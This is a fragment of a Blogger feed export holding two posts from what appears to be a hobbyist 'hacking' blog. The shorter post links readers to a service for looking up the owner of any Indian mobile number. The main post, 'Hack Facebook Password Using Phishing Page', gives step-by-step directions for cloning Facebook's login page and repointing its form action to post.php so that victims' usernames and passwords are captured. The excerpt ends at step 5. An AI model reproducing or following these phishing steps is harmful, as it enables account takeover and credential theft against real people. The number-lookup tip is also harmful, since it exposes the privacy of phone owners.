src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-6744232973913448461</id><published>2013-10-20T22:55:00.000+05:30</published><updated>2013-10-20T22:55:15.816+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Mobile"/><title type='text'>Track any Mobile No. in India Free</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Now you can track maximum mobile no. owner name in India. There is one of the biggest database available for it.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Easy Steps:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;1. go to Site2sms.com.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;2. Register here.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;3. Now go through the below link-&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: lime; font-size: large;&quot;&gt;&lt;a href=&quot;http://www.site2sms.com/user/track_mobile.asp&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Locate Mobile No.&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/6744232973913448461/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/track-any-mobile-no-in-india-free.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/6744232973913448461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/6744232973913448461'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/track-any-mobile-no-in-india-free.html' title='Track any Mobile No. in India Free'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-4297682195689319687</id><published>2013-10-05T18:24:00.000+05:30</published><updated>2013-10-05T18:24:24.337+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><title type='text'>Hack Facebook Password Using Phishing Page</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;Phishing&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;is attempting to acquire information (and sometimes, indirectly, money) such as usernames,&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Password&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;Password&quot;&gt;passwords&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;, and credit card details by masquerading as a trustworthy entity in an&amp;nbsp;&lt;/span&gt;&lt;a class=&quot;mw-redirect&quot; href=&quot;http://en.wikipedia.org/wiki/Electronic_communication&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;Electronic communication&quot;&gt;electronic communication&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by&amp;nbsp;&lt;/span&gt;&lt;a class=&quot;mw-redirect&quot; href=&quot;http://en.wikipedia.org/wiki/E-mail&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;E-mail&quot;&gt;e-mail&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a class=&quot;mw-redirect&quot; href=&quot;http://en.wikipedia.org/wiki/E-mail_spoofing&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;E-mail spoofing&quot;&gt;spoofing&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;or&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Instant_messaging&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;Instant messaging&quot;&gt;instant messaging&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;and it often directs users to enter details at a fake website whose&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Look_and_feel&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;Look and feel&quot;&gt;look and feel&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;are almost identical to the legitimate one. Phishing is an example of&amp;nbsp;&lt;/span&gt;&lt;a class=&quot;mw-redirect&quot; href=&quot;http://en.wikipedia.org/wiki/Social_engineering_%28computer_security%29&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;Social engineering (computer security)&quot;&gt;social engineering&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;techniques used to deceive users,&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;and exploits the poor usability of current web security technologies.&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp;Attempts to deal with the growing number of reported phishing incidents include&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Legislation&quot; style=&quot;background-color: white; background-image: none; border: 0px; color: #0b0080; font-family: sans-serif; line-height: 19px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto; text-decoration: none;&quot; title=&quot;Legislation&quot;&gt;legislation&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;, user training, public awareness, and technical security measures.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; line-height: 19px;&quot;&gt;today we create a facebook phishing page which look similar to a facebook page but it&#39;s not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; color: #cc0000; font-family: sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;u&gt;FACEBOOK PHISHING....&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHcRitlwdCkzheu9FZgWYG0gAIofF1aAFRTDKLTuabt2MPlTryVf9ub8QGLPtEklpy5BTLbnyBbnJzxvDc2PQu9rc4BI1JQB9bpxzeYgZDSev1l6-Tv4ucz5_5GinPsekNed7cE3wTgUw/s1600/images+%288%29.jpg&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img alt=&quot;facebook hack&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHcRitlwdCkzheu9FZgWYG0gAIofF1aAFRTDKLTuabt2MPlTryVf9ub8QGLPtEklpy5BTLbnyBbnJzxvDc2PQu9rc4BI1JQB9bpxzeYgZDSev1l6-Tv4ucz5_5GinPsekNed7cE3wTgUw/s1600/images+%288%29.jpg&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; title=&quot;hacking facebook account&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;h3 style=&quot;border: none; color: #232323; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 22px; font-weight: normal; line-height: 28px; list-style: none; margin: 0px 0px 0.818em; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;color: #cc0000; font-size: medium; line-height: 19px;&quot;&gt;&lt;u&gt;steps to create a phishing page:&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;1.&lt;/span&gt;Go to the&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;Facebook&amp;nbsp;page&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;,and then right click on the page, u will see the option&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #cc0000; line-height: 19px;&quot;&gt;view source page&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;,click on that.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsmPE-MmXtL7WrLDNE_U8x5YdDM5oCP059Fw0gTP1sRrAPL6z-yU630NAZKBMCiACexq0gLOF5jsU25IMi0OjywjVFjAN87jNhvh042oCIAIyrOvoOX5cm-Hn-OqU4-FOKcRjCyhPsF3M/s1600/Untitled.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsmPE-MmXtL7WrLDNE_U8x5YdDM5oCP059Fw0gTP1sRrAPL6z-yU630NAZKBMCiACexq0gLOF5jsU25IMi0OjywjVFjAN87jNhvh042oCIAIyrOvoOX5cm-Hn-OqU4-FOKcRjCyhPsF3M/s1600/Untitled.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;2.&lt;/span&gt;now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;3.&lt;/span&gt;Now open the notepad and press&amp;nbsp;&lt;span style=&quot;color: #cc0000;&quot;&gt;CTRL+F&lt;/span&gt;,and type&lt;span style=&quot;color: #cc0000;&quot;&gt;&amp;nbsp;ACTION.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXiiYE-TelLr52na25c8n5-_x1hWfvqGAe_9ZX6Qjl9HCG7NIlwc2T3hY6ygO0oJKl42nExamZgpxEStEs2r3EzWvSxOdQEUuRsDkmqDzGmsN21K3qATnUtCQiPrHlOn3ohalp7FjTUdU/s1600/Untitled.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img alt=&quot;facebook phishing script&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXiiYE-TelLr52na25c8n5-_x1hWfvqGAe_9ZX6Qjl9HCG7NIlwc2T3hY6ygO0oJKl42nExamZgpxEStEs2r3EzWvSxOdQEUuRsDkmqDzGmsN21K3qATnUtCQiPrHlOn3ohalp7FjTUdU/s1600/Untitled.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; title=&quot;hacking facebook account&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;4.&lt;/span&gt;You will have to find a text which looks like ..&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;h4 style=&quot;border: none; color: #232323; font-size: 14px; font-weight: normal; line-height: 1.125em; list-style: none; margin: 0px 0px 1.125em; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;webkit-html-attribute-name&quot; style=&quot;color: #cc0000; font-family: monospace; white-space: pre-wrap;&quot;&gt;&lt;u&gt;action&lt;/u&gt;&lt;/span&gt;&lt;span style=&quot;color: #881280; font-family: monospace; white-space: pre-wrap;&quot;&gt;=&lt;u&gt;&quot;&lt;/u&gt;&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;&lt;u&gt;&lt;span class=&quot;webkit-html-attribute-value&quot; style=&quot;font-family: monospace; white-space: pre-wrap;&quot;&gt;https://www.facebook.com/login.php?&lt;/span&gt;&lt;span class=&quot;webkit-html-attribute-value&quot; style=&quot;font-family: monospace; white-space: pre-wrap;&quot;&gt;login_attempt=1&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style=&quot;color: #881280; font-family: monospace; white-space: pre-wrap;&quot;&gt;&quot;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;5.&lt;/span&gt;delete all the text written in red colour and instead of it write post.php.then it will look like...&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style=&quot;color: #cc0000;&quot;&gt;action=&lt;/span&gt;&quot;&lt;span style=&quot;color: #990000;&quot;&gt;&lt;u&gt;post.php&lt;/u&gt;&lt;/span&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
